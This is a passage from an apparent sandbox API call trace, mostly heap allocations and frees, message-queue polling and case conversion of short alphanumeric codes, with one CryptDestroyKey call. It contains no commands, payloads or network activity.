Size=0x8) returned 0x2415a18 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0160.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0160.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.769] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0160.769] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.769] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0160.769] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.769] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0160.769] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0160.769] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.770] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0160.770] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.770] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0160.770] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0160.770] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0160.770] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.771] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.771] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.771] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.771] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.771] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.771] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.772] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.772] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.772] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.773] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0160.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.774] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0160.774] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0160.774] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.774] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0160.774] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.774] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.774] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.775] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.775] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.775] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.775] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0160.775] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.776] CryptDestroyKey (hKey=0xaa5660) returned 1 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a2048 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a2268 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0160.778] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0160.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.779] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.779] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0160.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.779] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.779] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.780] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.780] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.780] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.780] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.780] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 